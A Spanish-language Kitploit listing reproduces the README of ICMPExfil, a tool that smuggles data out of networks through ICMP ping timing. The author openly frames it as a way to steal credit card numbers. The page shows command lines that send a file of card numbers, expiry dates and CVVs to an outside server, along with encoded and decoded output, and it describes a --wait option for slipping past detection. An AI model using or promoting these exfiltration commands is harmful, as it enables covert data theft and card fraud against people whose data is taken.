Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ICMPExfil — Exfiltra datos con ICMP | Kitploit
Herramientas/GitHubGitHub/martinoj2009/icmpexfil
Exfiltración de DatosSeguridad de RedesPruebas de Penetración
GitHubmartinoj2009/icmpexfil

ICMPExfil

Exfiltra datos con ICMP

Ver Repositorio
10123hace 8 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ICMP Exfil

ICMP Exfil te permite transmitir datos a través de paquetes ICMP válidos. Usas el script del cliente para pasar los datos que deseas exfiltrar, y luego en el dispositivo al que estás transmitiendo ejecutas el servidor. Cualquier persona que observe (sea humano o sistema de seguridad) solo verá paquetes ICMP válidos, no hay nada malicioso en la estructura de los paquetes. Tus datos tampoco están ocultos dentro de los paquetes ICMP, por lo que mirar el paquete no te dice qué fue exfiltrado.

Screen Shot

Autor

Martino Jones, martinojones.com.

ASCII

Por ahora, lo único para lo que he añadido soporte son caracteres ASCII. Podrás exfiltrar cualquier cosa que pueda representarse con caracteres ASCII (por ejemplo, letras y números). Por ejemplo: si tomaste prestados algunos números geniales de 16 dígitos, usarías el script del cliente para pasar esos números a tu servidor haciendo ./ping.py --ascii "4111111111111111".

Envío al servidor

Tienes dos opciones para configurar el servidor al que enviar. Puedes usar --ip o puedes establecer la IP predeterminada en el script llamado ipToPing.

Espera

Si quieres ser un poco más paciente y dificultar que la gente note que estás exfiltrando datos, puedes usar --wait para especificar la cantidad de tiempo mínimo + el tiempo que se supone debe pasar para que los datos se transfieran. Esto todavía está en desarrollo... así que tendrás que hacer esta conversión tú mismo, pero no debería tomarme mucho tiempo agregarlo... tampoco importa demasiado ya que la mayoría de las personas y sistemas de seguridad aún no lo detectan.

Verbose

Si deseas ver los pings que están pasando, puedes usar --show.

Iniciar/Detener Servidor

Cuando quieras iniciar el servidor, simplemente ejecuta sudo python3 server.py. No necesitas hacer nada más. Cuando hayas terminado, solo necesitas presionar Control+C. Por ahora, el servidor necesita trabajo, debe mapear la entrada según quién recibió los datos; actualmente solo lo he probado con un cliente haciendo ping al servidor, esto por supuesto necesita ser ajustado. La base ya está ahí, solo falta organizar el reinicio.

Ejemplo

Encontré una base de datos llena de estos números geniales de 16 dígitos, necesito guardarlos para futuras investigaciones, así que los guardo en un archivo llamado file: Comando:./ping.py --ip 1.2.3.4 --asciiFile file Contenido del archivo: 4587965312457852 01/15 456 Martino Jones | 4567965382457452 03/16 236 Martino Joe Datos codificados: ['0110100', '0110101', '0111000', '0110111', '0111001', '0110110', '0110101', '0110011', '0110001', '0110010', '0110100', '0110101', '0110111', '0111000', '0110101', '0110010', '0100000', '0110000', '0110001', '0101111', '0110001', '0110101', '0100000', '0110100', '0110101', '0110110', '0100000', '1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1101110', '1100101', '1110011', '0100000', '1111100', '0100000', '0110100', '0110101', '0110110', '0110111', '0111001', '0110110', '0110101', '0110011', '0111000', '0110010', '0110100', '0110101', '0110111', '0110100', '0110101', '0110010', '0100000', '0110000', '0110011', '0101111', '0110001', '0110110', '0100000', '0110010', '0110011', '0110110', '0100000', '1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1100101', '0001010'] Servidor:

root@kitploit:~
Calculating offsets


4 5 8 7 9 6 5 3 1 2 4 5 7 8 5 2   0 1 / 1 5   4 5 6   M a r t i n o   J o n e s   |   4 5 6 7 9 6 5 3 8 2 4 5 7 4 5 2   0 3 / 1 6   2 3 6   M a r t i n o   J o e 

TODO

Si deseas ayudar, hay varias cosas que aún necesito agregar:

  • Transmitir archivos binarios, simplemente se puede leer el archivo como binario y no será necesario codificar.
  • Permitir pasar al servidor el desplazamiento (offset), en caso de que quieras hacer la ventana más grande o más pequeña, especialmente útil en conexiones muy pobres.
  • Imprimir el mapeo de IP a DATOS al terminar.
  • Permitir servidor silencioso.
  • Permitir mostrar los datos a medida que llegan, un poco más complicado, pero solo requiere algunos cálculos de desplazamiento sobre la marcha.
  • Más cosas a medida que se me ocurran ;-)
Descargar herramienta